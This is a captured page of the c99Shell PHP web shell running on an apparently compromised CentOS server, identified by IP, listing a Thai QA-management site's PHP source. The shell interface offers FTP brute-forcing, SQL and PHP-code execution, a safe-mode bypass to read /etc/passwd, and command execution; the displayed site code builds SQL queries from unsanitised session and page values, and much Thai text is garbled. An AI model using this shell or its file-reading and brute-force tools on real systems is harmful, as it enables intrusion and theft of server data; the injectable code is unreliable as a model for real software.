110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/QA/ drwxr-xr-x Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php

session_start();



 if (session_is_registered("valid_user")&&session_is_registered("Priority")&&session_is_registered("password") )

 {

include("../include/FunctionDB.php");

include("admin_menu.php");

 ConnectDB();

$Username = $valid_user;

$sql = "SELECT * FROM personal_tb WHERE Username='$Username'";

$result = mysql_query($sql) ;

$rs = mysql_fetch_array($result);

$row = mysql_num_rows($result); 

$strSQL = "SELECT * FROM qa_standard_tb Order By code";



if (! $Page)

$Page = 1;

$Pre_Page = $Page - 1;

$Next_Page = $Page +1;

$Per_Page = 30;

$result = mysql_query($strSQL);

$Page_start = ($Per_Page*$Page) - $Per_Page;

$Num_Rows = mysql_num_rows($result);

if( $Num_Rows <= $Per_Page)

   $Num_Pages = 1;

else if (($Num_Rows % $Per_Page) == 0)

       $Num_Pages = ($Num_Rows / $Per_Page);

else

        $Num_Pages = ($Num_Rows / $Per_Page) + 1;

$Num_Pages = (int)$Num_Pages;



if (( $Page > $Num_Pages) || ($Page < 0))

  echo"Page $Page More than $Num_Pages";

$strSQL .=" LIMIT $Page_start,$Per_Page" ;

$result = mysql_query($strSQL); 

$num = mysql_num_rows($result );

?> 



<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">

<link href="../source/style.css" rel="stylesheet" type="text/css">

<style type="text/css">

<!--

.style18 {font-size: 14px}

-->

</style>

<table width="806" border="0" cellpadding="0" cellspacing="0">

    <tr>

        <td width="806"><br>

          <fieldset>

            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Qa_menu.php" >Л№йТЛЕСЎ</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="AddResult.php">»ГРаБФ№јЕЎТГ»ГРЎС№¤ШіАТѕ</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="ResultList.php">КГШ»јЕЎТГ»ГРаБФ№</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="AddStand.php">аѕФиБўйНБЩЕµСЗє§ЄХйБТµГ°Т№</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="StandardList.php"> ўйНБЩЕ»ГРЎС№¤ШіАТѕ</a></font></legend>

            <label><div align="center">

              <form id="form1" name="form1" method="post" action="DelStand.php?Stand_code=<? echo $rs[Stand_code]?>">

<table width="100%" border="0" cellpadding="0" cellspacing="2" style="background-color:#eeeeee; border:1px solid gray">

  <tr bgcolor="#F4FDC6">

    <td height="22" colspan="5" ><div align="center"><font color="#000000" face="Tahoma"><strong><span class="style18"><font color="#000000" face="Tahoma"><strong>

      <input name="Stand_code" type="hidden" id="Stand_code" value="<? echo $rs[Stand_code]?>&codeId=<? $rs[codeId]?>" />

    </strong></font><font color="#003366">бЎйдў </font><font color="#003366" face="Tahoma">ЛСЗўйНБТµГ°Т№ЎТГ»ГРЎС№ </font></span></strong></font></div></td>

  </tr>

  <tr bgcolor="#CCCCCC">

    <td width="21" align="center" style="border:1px solid gray">&nbsp;</td>

    <td width="27" align="center" style="border:1px solid gray"><span class="style18"><font color="#000000" face="Tahoma">No.</font></span></td>

    <td width="73" align="center" style="border:1px solid gray"><span class="style18"><font color="#000000" face="Tahoma">аЕў·Хи</font></span></td>

    <td width="603" align="center" style="border:1px solid gray"><span class="style18"><font face="Tahoma">ЛСЗўйН</font></span></td>

    <td width="66" align="center" style="border:1px solid gray">&nbsp;</td>

  </tr>

  <?php

$i = 1;

 while($row = mysql_fetch_array($result))

 {



     if($count==0)

     {

?>

  <tr bgcolor="#F7F7F7" >

    <td align="center" ><input type="checkbox" name="checkbox[]" value="<? echo $row[code]?>" /></td>

    <td align="center" ><font color="#996600" size="2" face="Tahoma">

      <?=$i?>

    </font></td>

    <td align="center" bgcolor="#F7F7F7" ><div align="center"><font color="#003366" size="2" face="Tahoma"> <? echo $row["Stand_code"]?> </font></div></td>

    <td><font color="#003366" size="2" face="Tahoma"><? echo $row["Topic"]?></font></td>

    <td ><div align="center"><font face="Tahoma"><strong><a href="FrmEditStand.php?code=<? echo $row[code]?>" class="c style18">бЎйдў</a></strong></font></div></td>

  </tr>

  <?

    $count=1;

     }

else

{

?>

  <tr bgcolor="#FFFFFF">

    <td align="center" bordercolor="#FFFFFF" ><input type="checkbox" name="checkbox[]2" value="<? echo $row[code]?>" /></td>

    <td align="center" bordercolor="#FFFFFF" ><font color="#996600" size="2" face="Tahoma">

      <?=$i?>

    </font></td>

    <td height="18" align="center" bordercolor="#FFFFFF" ><div align="center"><font color="#003366" size="2" face="Tahoma"> <? echo $row["Stand_code"]?> </font></div></td>

    <td bordercolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma"><? echo $row["Topic"]?></font></td>

    <td bordercolor="#FFFFFF" ><div align="center"><font face="Tahoma"><strong><a href="FrmEditStand.php?code=<? echo $row[code]?>" class="c style18">бЎйдў</a></strong></font></div></td>

  </tr>

  <?

$count=0;

}

$i++;

 }    

CloseDB();

?>

  <tr bgcolor="#CCCCCC">

    <td colspan="5" align="center" ><input type="submit" name="Submit" value="Delete" /></td>

  </tr>

  <tr bgcolor="#F4FDC6">

    <td height="19" colspan="5" align="center" ><div align="center"><strong><font color="#000000" size="2" face="Tahoma">·Сй§ЛБґ</font><font color="#003399" size="2" face="Tahoma"> <? echo $num ?> </font><font color="#FFFFFF" size="2" face="Tahoma"><font color="#003366">ГТВЎТГ</font><font color="#FFFFFF">&nbsp;</font></font> </strong></div></td>

  </tr>

</table>

<table width="100%" border="0" cellpadding="0" cellspacing="1" bordercolor="#CCCCCC">

  <tr>

    <td align="right" bordercolor="#CCCCCC" class="Tahoma11"><div align="center"><font color="#FFFFFF"> <font color="#FFFFFF" size="3" face="MS Sans Serif"><strong> <font color="#0033CC"><font size="2" face="Tahoma">&nbsp;<?php echo $Num_Pages;?></font></font></strong></font><font color="#000000" size="2" face="Tahoma"><strong> Л№йТ</strong></font> <font color="#0033CC" size="2" face="Tahoma"><strong>

      <?php

if ($Pre_Page)

   echo"<a href=\"$PHP_SELF?Page=$Pre_Page\" class=\"PageLink\"><font =\"Ms San serif\" size=\"3\"><b>&lt;&lt; Previus</b> </font></a>";



   for($i=1;$i<=$Num_Pages;$i++)

   {

    if($i != $Page)

         echo" [<a href=\"$PHP_SELF?Page=$i\" class=\"PageLink\"><font =\"Ms San serif\" size=\"3\"><b>$i</b></font></a>] ";

    else

        echo"<b>$i</b>";

   }

if($Page != $Num_Pages)

 echo"<a href=\"$PHP_SELF?Page=$Next_Page\" class=\"PageLink\"><font =\"Ms San serif\" size=\"3\"><b> Next &gt;&gt;</b> </font></a>";

 ?>

    </strong></font> </font> </div></td>

  </tr>

</table>

<br>

            </form>

              </div>

            </label>

        </fieldset><br>

        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>ЛБТВаЛµШ :</b> гЄйаБТКм¤ЕФЎ·ХиЄЧиН<br>

      </font></td>

    </tr>

</table>

<?php 

    }

else

{

       echo"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";

       echo"Please Login ";

}

?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: